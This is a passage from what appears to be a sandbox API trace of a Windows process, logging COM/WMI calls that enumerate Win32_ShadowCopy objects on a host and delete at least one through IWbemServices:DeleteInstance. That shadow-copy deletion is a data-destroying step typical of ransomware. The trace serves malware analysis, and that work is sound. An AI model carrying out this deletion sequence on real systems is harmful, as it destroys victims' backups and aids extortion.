[7]=0x46)), ppvObject=0x1c64c680 | out: ppvObject=0x1c64c680*=0x1b792e70) returned 0x0 [0122.056] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b792e70, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c64c6b0 | out: pCid=0x1c64c6b0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0122.056] WbemDefPath:IUnknown:Release (This=0x1b792e70) returned 0x3 [0122.056] CoGetContextToken (in: pToken=0x1c64c690 | out: pToken=0x1c64c690) returned 0x0 [0122.056] WbemDefPath:IUnknown:AddRef (This=0x1c902dd0) returned 0x4 [0122.056] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c902dd0, riid=0x7fef2a9d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c7a8 | out: ppvObject=0x1c64c7a8*=0x0) returned 0x80004002 [0122.056] WbemDefPath:IUnknown:Release (This=0x1c902dd0) returned 0x3 [0122.056] WbemDefPath:IUnknown:Release (This=0x1c902dd0) returned 0x2 [0122.056] WbemDefPath:IUnknown:Release (This=0x1c901fe0) returned 0x0 [0122.057] WbemDefPath:IUnknown:Release (This=0x1c902dd0) returned 0x1 [0122.057] CoGetContextToken (in: pToken=0x1c64d3c0 | out: pToken=0x1c64d3c0) returned 0x0 [0122.057] CoGetContextToken (in: pToken=0x1c64d300 | out: pToken=0x1c64d300) returned 0x0 [0122.057] WbemDefPath:IUnknown:AddRef (This=0x1c902dd0) returned 0x2 [0122.057] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c902dd0, riid=0x1c64d440*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c64d420 | out: ppvObject=0x1c64d420*=0x1c902dd0) returned 0x0 [0122.057] WbemDefPath:IUnknown:Release (This=0x1c902dd0) returned 0x2 [0122.057] WbemDefPath:IUnknown:Release (This=0x1c902dd0) returned 0x1 [0122.057] CoGetContextToken (in: pToken=0x1c64d540 | out: pToken=0x1c64d540) returned 0x0 [0122.057] CoGetContextToken (in: pToken=0x1c64d480 | out: pToken=0x1c64d480) returned 0x0 [0122.057] WbemDefPath:IUnknown:AddRef (This=0x1c902dd0) returned 0x2 [0122.057] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c902dd0, riid=0x1c64d5c0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c64d5a0 | out: ppvObject=0x1c64d5a0*=0x1c902dd0) returned 0x0 [0122.058] WbemDefPath:IUnknown:Release (This=0x1c902dd0) returned 0x2 [0122.058] WbemDefPath:IUnknown:AddRef (This=0x1c902dd0) returned 0x3 [0122.058] WbemDefPath:IWbemPath:SetText (This=0x1c902dd0, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}\"") returned 0x0 [0122.058] WbemDefPath:IUnknown:Release (This=0x1c902dd0) returned 0x2 [0122.058] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64d800 | out: puCount=0x1c64d800*=0x2) returned 0x0 [0122.058] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d800*=0x0, pszText=0x0 | out: puBuffLength=0x1c64d800*=0x17, pszText=0x0) returned 0x0 [0122.058] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d800*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64d800*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0122.058] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64d2a0 | out: puCount=0x1c64d2a0*=0x2) returned 0x0 [0122.058] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64d2a0*=0x17, pszText=0x0) returned 0x0 [0122.058] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64d2a0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0122.058] IWbemClassObject:Get (in: This=0x1c906970, wszName="__NAMESPACE", lFlags=0, pVal=0x1c64d290*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d28c*=0, plFlavor=0x1c64d288*=0 | out: pVal=0x1c64d290*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c64d28c*=8, plFlavor=0x1c64d288*=64) returned 0x0 [0122.059] SysStringLen (param_1="root\\cimv2") returned 0xa [0122.059] IWbemClassObject:Get (in: This=0x1c906970, wszName="__NAMESPACE", lFlags=0, pVal=0x1c64d2a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64 | out: pVal=0x1c64d2a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64) returned 0x0 [0122.059] SysStringLen (param_1="root\\cimv2") returned 0xa [0122.059] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64d2a0 | out: puCount=0x1c64d2a0*=0x2) returned 0x0 [0122.059] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64d2a0*=0x17, pszText=0x0) returned 0x0 [0122.059] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64d2a0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0122.059] IWbemClassObject:Get (in: This=0x1c906970, wszName="__CLASS", lFlags=0, pVal=0x1c64d290*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d28c*=0, plFlavor=0x1c64d288*=0 | out: pVal=0x1c64d290*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c64d28c*=8, plFlavor=0x1c64d288*=64) returned 0x0 [0122.059] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0122.059] IWbemClassObject:Get (in: This=0x1c906970, wszName="__CLASS", lFlags=0, pVal=0x1c64d2a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64 | out: pVal=0x1c64d2a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64) returned 0x0 [0122.059] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0122.062] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c902dd0, puCount=0x1c64cfa0 | out: puCount=0x1c64cfa0*=0x2) returned 0x0 [0122.062] WbemDefPath:IWbemPath:GetText (in: This=0x1c902dd0, lFlags=4, puBuffLength=0x1c64cfa0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cfa0*=0x54, pszText=0x0) returned 0x0 [0122.062] WbemDefPath:IWbemPath:GetText (in: This=0x1c902dd0, lFlags=4, puBuffLength=0x1c64cfa0*=0x54, pszText="00000000000000000000000000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c64cfa0*=0x54, pszText="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}\"") returned 0x0 [0122.062] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64cef0 | out: puCount=0x1c64cef0*=0x2) returned 0x0 [0122.062] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64cef0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cef0*=0x17, pszText=0x0) returned 0x0 [0122.062] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64cef0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64cef0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0122.062] CoGetContextToken (in: pToken=0x1c64cd80 | out: pToken=0x1c64cd80) returned 0x0 [0122.062] WbemLocator:IUnknown:AddRef (This=0x1b797ce0) returned 0x3 [0122.062] WbemLocator:IUnknown:QueryInterface (in: This=0x1b797ce0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c950 | out: ppvObject=0x1c64c950*=0x1b797ce0) returned 0x0 [0122.063] WbemLocator:IUnknown:Release (This=0x1b797ce0) returned 0x3 [0122.063] WbemLocator:IUnknown:Release (This=0x1b797ce0) returned 0x2 [0122.063] IWbemClassObject:Get (in: This=0x1c906970, wszName="__GENUS", lFlags=0, pVal=0x1c64cee0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64cedc*=0, plFlavor=0x1c64ced8*=0 | out: pVal=0x1c64cee0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c64cedc*=3, plFlavor=0x1c64ced8*=64) returned 0x0 [0122.063] WbemDefPath:IWbemPath:GetText (in: This=0x1c902dd0, lFlags=2, puBuffLength=0x1c64cfb0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cfb0*=0x3d, pszText=0x0) returned 0x0 [0122.063] WbemDefPath:IWbemPath:GetText (in: This=0x1c902dd0, lFlags=2, puBuffLength=0x1c64cfb0*=0x3d, pszText="000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c64cfb0*=0x3d, pszText="Win32_ShadowCopy.ID=\"{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}\"") returned 0x0 [0122.063] IWbemServices:DeleteInstance (in: This=0x1c8f44f8, strObjectPath="Win32_ShadowCopy.ID=\"{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0122.988] CoTaskMemAlloc (cb=0x8) returned 0x1b77f8d0 [0122.988] IEnumWbemClassObject:Next (in: This=0x1c8f4788, lTimeout=-1, uCount=0x1, apObjects=0x1b77f8d0, puReturned=0x1c64d8b8 | out: apObjects=0x1b77f8d0*=0x1c907010, puReturned=0x1c64d8b8*=0x1) returned 0x0 [0122.990] IUnknown:QueryInterface (in: This=0x1c907010, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64cbe0 | out: ppvObject=0x1c64cbe0*=0x1c907010) returned 0x0 [0122.990] IUnknown:QueryInterface (in: This=0x1c907010, riid=0x7fef2a9d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c64cc60 | out: ppvObject=0x1c64cc60*=0x0) returned 0x80004002 [0122.990] IUnknown:QueryInterface (in: This=0x1c907010, riid=0x7fef2a9d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c64c9f8 | out: ppvObject=0x1c64c9f8*=0x0) returned 0x80004002 [0122.991] IUnknown:AddRef (This=0x1c907010) returned 0x3 [0122.991] CoGetContextToken (in: pToken=0x1c64c8b0 | out: pToken=0x1c64c8b0) returned 0x0 [0122.991] IUnknown:QueryInterface (in: This=0x1c907010, riid=0x7fef2a9d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c870 | out: ppvObject=0x1c64c870*=0x1c907018) returned 0x0 [0122.991] IMarshal:GetUnmarshalClass (in: This=0x1c907018, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c64c8a0 | out: pCid=0x1c64c8a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0122.991] IUnknown:Release (This=0x1c907018) returned 0x3 [0122.991] CoGetContextToken (in: pToken=0x1c64c880 | out: pToken=0x1c64c880) returned 0x0 [0122.992] IUnknown:AddRef (This=0x1c907010) returned 0x4 [0122.992] IUnknown:QueryInterface (in: This=0x1c907010, riid=0x7fef2a9d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c998 | out: ppvObject=0x1c64c998*=0x0) returned 0x80004002 [0122.992] IUnknown:Release (This=0x1c907010) returned 0x3 [0122.992] IUnknown:Release (This=0x1c907010) returned 0x2 [0122.992] CoGetContextToken (in: pToken=0x1c64cd40 | out: pToken=0x1c64cd40) returned 0x0 [0122.992] CoGetContextToken (in: pToken=0x1c64cc80 | out: pToken=0x1c64cc80) returned 0x0 [0122.992] IUnknown:AddRef (This=0x1c907010) returned 0x3 [0122.992] IUnknown:QueryInterface (in: This=0x1c907010, riid=0x1c64cdc0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c64cda0 | out: ppvObject=0x1c64cda0*=0x1c907010) returned 0x0 [0122.992] IUnknown:Release (This=0x1c907010) returned 0x3 [0122.993] IUnknown:Release (This=0x1c907010) returned 0x2 [0122.993] IUnknown:Release (This=0x1c907010) returned 0x1 [0122.993] CoTaskMemFree (pv=0x1b77f8d0) [0122.993] CoGetContextToken (in: pToken=0x1c64d6c0 | out: pToken=0x1c64d6c0) returned 0x0 [0122.993] IUnknown:AddRef (This=0x1c907010) returned 0x2 [0122.993] IWbemClassObject:Get (in: This=0x1c907010, wszName="__GENUS", lFlags=0, pVal=0x1c64d830*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d82c*=0, plFlavor=0x1c64d828*=0 | out: pVal=0x1c64d830*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c64d82c*=3, plFlavor=0x1c64d828*=64) returned 0x0 [0122.993] IWbemClassObject:Get (in: This=0x1c907010, wszName="__PATH", lFlags=0, pVal=0x1c64d7d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d7cc*=0, plFlavor=0x1c64d7c8*=0 | out: pVal=0x1c64d7d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{7199C78C-6563-4398-B813-4A3F86995AEC}\"", varVal2=0x0), pType=0x1c64d7cc*=8, plFlavor=0x1c64d7c8*=64) returned 0x0 [0122.993] SysStringLen (param_1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{7199C78C-6563-4398-B813-4A3F86995AEC}\"") returned 0x53 [0122.994] CoGetObjectContext (in: riid=0x1c64d768*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c64d760 | out: ppv=0x1c64d760*=0x212498) returned 0x0 [0122.994] IComThreadingInfo:GetCurrentApartmentType (in: This=0x212498, pAptType=0x1c64d780 | out: pAptType=0x1c64d780*=1) returned 0x0 [0122.994] IUnknown:QueryInterface (in: This=0x212498, riid=0x359dd40*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c64d888 | out: ppvObject=0x1c64d888*=0x0) returned 0x80004002 [0122.994] IUnknown:Release (This=0x212498) returned 0x1 [0122.995] CoGetClassObject (in: rclsid=0x1b7738e8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2a9d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c64cdf0 | out: ppv=0x1c64cdf0*=0x1c9020a0) returned 0x0 [0122.995] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c9020a0, riid=0x7fef2a9d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c64cb00 | out: ppvObject=0x1c64cb00*=0x0) returned 0x80004002 [0122.995] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1c9020a0, pUnkOuter=0x0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64cae8 | out: ppvObject=0x1c64cae8*=0x1c902e90) returned 0x0 [0122.995] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c902e90, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c9f0 | out: ppvObject=0x1c64c9f0*=0x1c902e90) returned 0x0 [0122.995] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c902e90, riid=0x7fef2a9d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c64ca70 | out: ppvObject=0x1c64ca70*=0x0) returned 0x80004002 [0122.996] WbemDefPath:IUnknown:AddRef (This=0x1c902e90) returned 0x3 [0122.996] CoGetContextToken (in: pToken=0x1c64c6c0 | out: pToken=0x1c64c6c0) returned 0x0 [0122.996] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c902e90, riid=0x7fef2a9d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c680 | out: ppvObject=0x1c64c680*=0x1b792f70) returned 0x0 [0122.996] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b792f70, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c64c6b0 | out: pCid=0x1c64c6b0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0122.996] WbemDefPath:IUnknown:Release (This=0x1b792f70) returned 0x3 [0122.996] CoGetContextToken (in: pToken=0x1c64c690 | out: pToken=0x1c64c690) returned 0x0 [0122.996] WbemDefPath:IUnknown:AddRef (This=0x1c902e90) returned 0x4 [0122.997] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c902e90, riid=0x7fef2a9d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c7a8 | out: ppvObject=0x1c64c7a8*=0x0) returned 0x80004002 [0122.997] WbemDefPath:IUnknown:Release (This=0x1c902e90) returned 0x3 [0122.997] WbemDefPath:IUnknown:Release (This=0x1c902e90) returned 0x2 [0122.997] WbemDefPath:IUnknown:Release (This=0x1c9020a0) returned 0x0 [0122.997] WbemDefPath:IUnknown:Release (This=0x1c902e90) returned 0x1 [0122.997] CoGetContextToken (in: pToken=0x1c64d3c0 | out: pToken=0x1c64d3c0) returned 0x0 [0122.997] CoGetContextToken (in: pToken=0x1c64d300 | out: pToken=0x1c64d300) returned 0x0 [0122.997] WbemDefPath:IUnknown:AddRef (This=0x1c902e90) returned 0x2 [0122.997] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c902e90, riid=0x1c64d440*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c64d420 | out: ppvObject=0x1c64d420*=0x1c902e90) returned 0x0 [0122.998] WbemDefPath:IUnknown:Release (This=0x1c902e90) returned 0x2 [0122.998] WbemDefPath:IUnknown:Release (This=0x1c902e90) returned 0x1 [0122.998] CoGetContextToken (in: pToken=0x1c64d540 | out: pToken=0x1c64d540) returned 0x0 [0122.998] CoGetContextToken (in: pToken=0x1c64d480 | out: pToken=0x1c64d480) returned 0x0 [0122.998] WbemDefPath:IUnknown:AddRef (This=0x1c902e90) returned 0x2 [0122.998] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c902e90, riid=0x1c64d5c0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c64d5a0 | out: ppvObject=0x1c64d5a0*=0x1c902e90) returned 0x0 [0122.998] WbemDefPath:IUnknown:Release (This=0x1c902e90) returned 0x2 [0122.998] WbemDefPath:IUnknown:AddRef (This=0x1c902e90) returned 0x3 [0122.998] WbemDefPath:IWbemPath:SetText (This=0x1c902e90, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{7199C78C-6563-4398-B813-4A3F86995AEC}\"") returned 0x0 [0122.998] WbemDefPath:IUnknown:Release (This=0x1c902e90) returned 0x2 [0122.999] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64d800 | out: puCount=0x1c64d800*=0x2) returned 0x0 [0122.999] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d800*=0x0, pszText=0x0 | out: puBuffLength=0x1c64d800*=0x17, pszText=0x0) returned 0x0 [0122.999] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d800*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64d800*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0122.999] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64d2a0 | out: puCount=0x1c64d2a0*=0x2) returned 0x0 [0122.999] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64d2a0*=0x17, pszText=0x0) returned 0x0 [0122.999] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64d2a0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0122.999] IWbemClassObject:Get (in: This=0x1c907010, wszName="__NAMESPACE", lFlags=0, pVal=0x1c64d290*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d28c*=0, plFlavor=0x1c64d288*=0 | out: pVal=0x1c64d290*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c64d28c*=8, plFlavor=0x1c64d288*=64) returned 0x0 [0122.999] SysStringLen (param_1="root\\cimv2") returned 0xa [0122.999] IWbemClassObject:Get (in: This=0x1c907010, wszName="__NAMESPACE", lFlags=0, pVal=0x1c64d2a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64 | out: pVal=0x1c64d2a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64) returned 0x0 [0122.999] SysStringLen (param_1="root\\cimv2") returned 0xa [0122.999] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64d2a0 | out: puCount=0x1c64d2a0*=0x2) returned 0x0 [0122.999] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64d2a0*=0x17, pszText=0x0) returned 0x0 [0122.999] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64d2a0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0123.000] IWbemClassObject:Get (in: This=0x1c907010, wszName="__CLASS", lFlags=0, pVal=0x1c64d290*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d28c*=0, plFlavor=0x1c64d288*=0 | out: pVal=0x1c64d290*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c64d28c*=8, plFlavor=0x1c64d288*=64) returned 0x0 [0123.000] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0123.000] IWbemClassObject:Get (in: This=0x1c907010, wszName="__CLASS", lFlags=0, pVal=0x1c64d2a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64 | out: pVal=0x1c64d2a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64) returned 0x0 [0123.000] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0123.003] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c902e90, puCount=0x1c64cfa0 | out: puCount=0x1c64cfa0*=0x2) returned 0x0 [0123.003] WbemDefPath:IWbemPath:GetText (in: This=0x1c902e90, lFlags=4, puBuffLength=0x1c64cfa0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cfa0*=0x54, pszText=0x0) returned 